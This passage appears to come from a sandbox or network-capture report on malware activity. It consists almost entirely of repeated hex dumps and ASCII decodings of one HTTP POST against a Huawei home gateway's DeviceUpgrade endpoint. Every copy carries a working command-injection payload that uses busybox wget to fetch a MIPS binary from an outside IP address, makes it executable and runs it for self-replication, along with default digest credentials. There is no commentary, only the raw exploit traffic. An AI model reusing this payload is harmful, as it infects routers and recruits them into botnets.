6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 